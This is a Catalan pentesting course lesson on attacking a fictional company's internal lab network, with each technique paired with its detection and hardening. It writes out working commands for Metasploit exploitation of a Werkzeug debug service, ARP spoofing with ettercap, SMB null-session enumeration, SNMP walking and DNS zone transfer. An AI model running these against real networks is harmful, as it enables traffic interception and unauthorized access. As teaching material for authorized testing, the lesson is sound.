Auditada la botiga a 04-02, girem cap a la infraestructura interna de TechNova: la xarxa 10.10.10.0/24, amb el seu servidor Linux, el controlador de xarxa, les estacions i els serveis que el Mòdul 3 va deixar a la llista prioritzada. Aquí la superfície no és una aplicació web, sinó serveis de xarxa i el mateix mitjà de transport: un servei amb CVE explotable, una sessió nul·la de SMB al servidor intern, trànsit que potser viatja sense xifrar i configuracions febles (SNMP public, DNS mal ajustat).

L'enquadrament es torna encara més delicat que al web, perquè diverses tècniques de xarxa poden afectar tercers o la disponibilitat: un ARP spoofing mal fet talla la xarxa d'una oficina; un mòdul d'explotació sobre un servei fràgil el fa caure. Per això, més que mai: només el laboratori autoritzat de TechNova, dins de l'abast i la finestra pactada, amb control de l'impacte (res de denegació de servei no acordada) i documentant cada acció. I un límit clar: aquí aconseguim execució o accés a un servei; escalar privilegis i moure's per la xarxa (pivoting) és Mòdul 5, no ho toquem.

Contingut

  1. La xarxa com a superfície d'atac
  2. Explotar un servei amb CVE (Metasploit responsable)
  3. MITM: ARP spoofing i sniffing
  4. Atacs a SMB i NTLM relay
  5. Configuracions de xarxa mal ajustades (SNMP, DNS)
  6. Detecció: què veu l'IDS
  7. Hardening de xarxa (contrapartida)
  8. Errors comuns i consells
  9. Exercicis
  10. Conclusió

  1. La xarxa com a superfície d'atac

Un servei de xarxa és un programa escoltant en un port (03-01/03-02). Es pot atacar per dues vies complementàries:

  • Atacar el servei: aprofitar una fallada del programari que escolta (un CVE, una mala configuració, credencials febles) per aconseguir accés o execució.
  • Atacar el mitjà: interceptar o manipular el trànsit que viatja per la xarxa (MITM), aprofitant protocols sense autenticació (ARP) o sense xifratge (HTTP, FTP, Telnet).
flowchart LR
    A[Serveis de xarxa<br/>SMB, SNMP, DNS, CVE] -->|atacar el servei| C[Acces / execucio]
    B[Trafic a la LAN<br/>ARP, HTTP, FTP] -->|atacar el mitja| D[Credencials / dades]

  1. Explotar un servei amb CVE (Metasploit responsable)

Quan un servei corre una versió amb CVE explotable confirmat (candidata validada a 03-03), Metasploit ofereix mòduls ja escrits. Ús responsable al laboratori: verificar abans, triar el mòdul més fiable (recorda el Rank de 04-01) i el payload de menor impacte.

msfconsole -q
msf6 > search werkzeug debug          # buscar modul per a la candidata #2
msf6 > use exploit/multi/http/werkzeug_debug_rce
msf6 > set RHOSTS 10.10.10.15          # actiu del laboratori, en abast
msf6 > set RPORT 54321
msf6 > check                            # comprova SENSE explotar si es vulnerable
[+] 10.10.10.15:54321 - The target appears to be vulnerable.
msf6 > set PAYLOAD cmd/unix/generic     # payload minim per validar
msf6 > set CMD id                       # nomes executar 'id' com a prova
msf6 > run
[*] uid=1000(devapp) gid=1000(devapp) groups=1000(devapp)

Anàlisi: check valida la vulnerabilitat sense llançar l'exploit —fes-lo servir sempre que existeixi—. I en lloc d'obrir directament una shell interactiva, executem un simple id: la sortida uid=1000(devapp) demostra execució de comandes i confirma que hem obtingut un punt de suport (foothold) amb privilegis limitats. Això és tot el que necessita l'informe; consolidar aquesta shell i escalar és Mòdul 5. La presentació a fons de Metasploit és a 07-02.

Contrapartida (remediació): aplicar el pedaç o retirar el programari en fi de vida, desactivar el mode debug de Werkzeug en qualsevol entorn accessible, i no exposar serveis de desenvolupament a la xarxa. Segmentar perquè dev no sigui abastable des d'on no ha de ser-ho.

  1. MITM: ARP spoofing i sniffing

Mecanisme. En una LAN, el protocol ARP no té autenticació: qualsevol host pot afirmar "jo sóc la passarel·la d'enllaç". Amb ARP spoofing, el pentester enganya una víctima i el gateway perquè el trànsit passi a través de la seva màquina (man-in-the-middle), i allà el pot llegir (sniffing) si va sense xifrar.

sequenceDiagram
    participant V as Victima 10.10.10.50
    participant A as Pentester 10.10.10.5
    participant G as Gateway 10.10.10.1
    A->>V: ARP: "10.10.10.1 esta a la MEVA MAC"
    A->>G: ARP: "10.10.10.50 esta a la MEVA MAC"
    V->>A: trafic (creient que va al gateway)
    A->>G: reenvia (per no tallar la xarxa)

Marc: NOMÉS laboratori. Aquesta tècnica intercepta comunicacions de tercers; fora d'un entorn autoritzat és il·legal. I cal reenviar el trànsit (ip_forward) per no provocar una caiguda de xarxa no acordada.

# Al laboratori, contra un host de prova de TechNova
echo 1 > /proc/sys/net/ipv4/ip_forward      # reenviar per NO tallar la xarxa
sudo ettercap -T -q -M arp:remote /10.10.10.50// /10.10.10.1//

PoC de baix impacte. Demostrar que es captura una credencial que viatja sense xifrar d'un servei de prova (per exemple un login per HTTP o FTP al laboratori), capturant un parell usuari/contrasenya fictici com a evidència. No s'intercepta usuaris reals ni s'acumula trànsit massiu.

Contrapartida: xifratge a tot arreu (HTTPS, SSH, SMB signat) fa inútil el sniffing; a la xarxa, Dynamic ARP Inspection i DHCP snooping als switches, port security i segmentació per VLAN. Si tot va xifrat, l'atacant veu bytes il·legibles.

  1. Atacs a SMB i NTLM relay

El Mòdul 3 va confirmar una sessió nul·la de SMB al servidor intern (10.10.10.55) amb un recurs RRHH accessible: una troballa de configuració, sòlida perquè no depèn d'una versió.

PoC de baix impacte (validar la sessió nul·la):

# Enumerar recursos sense credencials (sessio nul.la)
smbclient -N -L //10.10.10.55/
#   Sharename     Type
#   RRHH          Disk
enum4linux -a 10.10.10.55        # usuaris, grups, politica

# Llistar (no exfiltrar en massa) el contingut per demostrar l'acces
smbclient -N //10.10.10.55/RRHH -c 'ls'

Llistar el recurs i confirmar que RRHH és accessible sense credencials demostra la fallada. No es descarreguen tots els documents: n'hi ha prou amb l'evidència de l'accés.

NTLM relay (mecanisme, alt nivell). En xarxes Windows, si SMB no exigeix signatura, un atacant que capturi una autenticació NTLM la pot reenviar (relay) a un altre servei i autenticar-se com la víctima sense conèixer la seva contrasenya. És una tècnica potent; a aquest nivell n'hi ha prou de reconèixer el patró: autenticació capturada → reenviada → accés. Eines com responder i impacket-ntlmrelayx la implementen.

Contrapartida: exigir signatura SMB (SMB signing) neutralitza el relay; deshabilitar SMBv1, tancar sessions nul·les i anònimes, i aplicar mínim privilegi als recursos compartits. Retirar credencials i dades sensibles de shares oberts.

  1. Configuracions de xarxa mal ajustades (SNMP, DNS)

Molts accessos no venen d'un CVE, sinó d'un servei mal configurat (troballes confirmades i molt fiables):

Servei Mala configuració Risc Contrapartida
SNMP Comunitat public per defecte Fuga d'inventari, interfícies, processos Canviar comunitat, SNMPv3 xifrat, filtrar per IP
DNS Transferència de zona (AXFR) oberta Es descarrega el mapa intern de noms Restringir AXFR a secundaris autoritzats
FTP/Telnet En clar, o accés anònim Credencials i dades interceptables Migrar a SFTP/SSH; retirar Telnet
# SNMP: llegir informacio del sistema amb la comunitat per defecte (baix impacte)
snmpwalk -v2c -c public 10.10.10.30 1.3.6.1.2.1.1   # nomes la branca 'system'

# DNS: intentar una transferencia de zona
dig AXFR technova.lab @10.10.10.2

Llegir només la branca system de SNMP o comprovar si l'AXFR respon demostra la fuga sense abusar: no bolquem tota la MIB ni recorrem l'arbre sencer. Cadascun amb el seu arranjament a la taula.

  1. Detecció: què veu l'IDS

Els atacs de xarxa són especialment sorollosos i detectables, i convé que el pentester ho sàpiga (i que el SOC del client ho entreni):

  • ARP spoofing: genera respostes ARP anòmales i MACs duplicades; un IDS (Snort/Suricata) i eines com arpwatch el detecten a l'instant.
  • Explotació de serveis: les signatures d'exploits coneguts disparen alertes; pics de connexions fallides i payloads sospitosos queden als logs.
  • Enumeració SMB/SNMP: ràfegues de consultes anònimes o snmpwalk complets són patrons reconeixibles.

Que el SOC de TechNova vegi la teva activitat no és un fracàs: és una validació de la seva capacitat de detecció, i forma part del valor de l'informe.

  1. Hardening de xarxa (contrapartida)

Consolidant les defenses de tota la lliçó:

  • Xifratge per defecte: HTTPS, SSH, SMB signat, SNMPv3, SFTP. Anul·la el sniffing.
  • Switching segur: Dynamic ARP Inspection, DHCP snooping, port security, VLANs. Anul·la l'ARP spoofing i limita l'abast.
  • Segmentació: que dev, producció i ofimàtica estiguin separades; que un compromís en una no doni la xarxa sencera.
  • Endurir serveis: apedaçar, retirar EOL, tancar sessions nul·les/anònimes, canviar credencials i comunitats per defecte, restringir AXFR.
  • Monitoratge: IDS/IPS i revisió de logs per detectar el que aquest mateix mòdul genera.

  1. Errors Comuns i Consells

  • Llançar ARP spoofing sense reenviar el trànsit. Si oblides ip_forward, talles la comunicació de la víctima: denegació de servei no acordada. Configura-ho abans.
  • Fer servir mòduls DoS o exploits de baixa fiabilitat sobre serveis fràgils. Poden fer caure el servei del client. Prioritza Rank alt i fes servir check abans de run.
  • Exfiltrar tot un share o tota la MIB SNMP. Trenca el control d'impacte. Llista i extreu una mostra que provi l'accés.
  • Interceptar trànsit fora del laboratori. El MITM sobre comunicacions reals de tercers és il·legal. Només entorns autoritzats.
  • Confondre explotació amb post-explotació. Obtenir la shell devapp és el final d'aquesta lliçó; escalar a root o pivotar a una altra subxarxa és Mòdul 5.
  • Ignorar la contrapartida. Una troballa de xarxa sense el seu hardening (xifratge, signatura SMB, DAI, SNMPv3) és mig informe. L'objectiu és que TechNova tanqui la porta.
  • Consell: en xarxa, el xifratge i la segmentació resolen la majoria d'aquestes classes de cop. Quan proposis remediació, comença per aquí.

  1. Exercicis

Exercici 1. Sobre el servidor intern 10.10.10.55 amb sessió nul·la de SMB i recurs RRHH, descriu la seqüència de PoC de baix impacte per validar l'accés sense exfiltrar els documents, i dona tres mesures de hardening amb les quals TechNova tancaria la fallada.

Exercici 2. Vas a demostrar un ARP spoofing al laboratori per provar que cert trànsit viatja sense xifrar. Explica què prepares per no provocar una caiguda de xarxa, quina evidència mínima capturaries, i quina és la contrapartida tècnica que faria inútil l'atac.

Exercici 3. El Mòdul 3 va marcar SNMP amb comunitat public a 10.10.10.30. Explica com validaries la fuga d'informació de manera controlada, per què és una troballa fiable tot i no tenir CVE, i com es remeia.

Solucions

Solució 1. PoC: (1) smbclient -N -L //10.10.10.55/ per llistar recursos sense credencials i veure RRHH; (2) enum4linux -a 10.10.10.55 per confirmar usuaris/política via sessió nul·la; (3) smbclient -N //10.10.10.55/RRHH -c 'ls' per llistar el contingut i demostrar l'accés, sense descarregar els documents. Evidència: la sortida que mostra el recurs accessible sense autenticació. Hardening: (a) tancar la sessió nul·la/anònima a la configuració SMB; (b) exigir signatura SMB (mitiga a més el NTLM relay) i deshabilitar SMBv1; (c) aplicar mínim privilegi al recurs i retirar les dades sensibles de RRHH d'un share obert, amb permisos per grup.

Solució 2. Preparació per no tallar la xarxa: habilitar el reenviament d'IP (echo 1 > /proc/sys/net/ipv4/ip_forward) abans d'enverinar, perquè el trànsit interceptat continuï arribant a la seva destinació; limitar l'atac a un host de prova i a la finestra acordada. Evidència mínima: un parell usuari/contrasenya fictici capturat d'un servei en clar (login HTTP/FTP de laboratori), com a prova que el trànsit va sense xifrar. Contrapartida: xifratge extrem a extrem (HTTPS/SSH/SMB signat) fa il·legible el trànsit interceptat, i a la xarxa Dynamic ARP Inspection + DHCP snooping impedeixen l'enverinament ARP.

Solució 3. Validació controlada: snmpwalk -v2c -c public 10.10.10.30 1.3.6.1.2.1.1 consultant només la branca system per demostrar que la comunitat per defecte respon i filtra informació (nom del sistema, versió), sense recórrer tota la MIB. És una troballa fiable perquè és una configuració confirmada, no una sospita per número de versió: no depèn d'un CVE ni d'un possible retroport, la fuga o existeix o no, i aquí existeix. Remediació: canviar la comunitat per una robusta o, millor, migrar a SNMPv3 (amb autenticació i xifratge) i restringir per IP quins hosts poden consultar.

Conclusió

Hem portat l'explotació del navegador a la xarxa. Sobre la infraestructura de TechNova hem validat un servei amb CVE (obtenint una execució de comandes de baix privilegi amb un simple id), confirmat la sessió nul·la de SMB de RRHH, entès el mecanisme de MITM/ARP spoofing i NTLM relay, i comprovat fugues per SNMP i DNS mal configurats. Cada tècnica, amb la seva PoC que demostra sense destruir, la seva detecció (com de sorollosa és per a un IDS) i la seva contrapartida de hardening: xifratge, switching segur, signatura SMB, SNMPv3 i segmentació.

Fixa't en el límit que hem respectat: hem aconseguit accés o execució en serveis, però ens hem aturat just aquí —consolidar, escalar i moure's per la xarxa és el Mòdul 5—. La lliçó següent, 04-04 Explotació de Vulnerabilitats de Sistemes, tanca el trio tècnic: com obtenir execució en un host aprofitant fallades del sistema operatiu i serveis locals, amb el desbordament de buffer explicat a nivell conceptual, fins a aconseguir un foothold amb privilegis limitats. L'escalada des d'aquest foothold continuarà sent Mòdul 5.

© Copyright 2026. Tots els drets reservats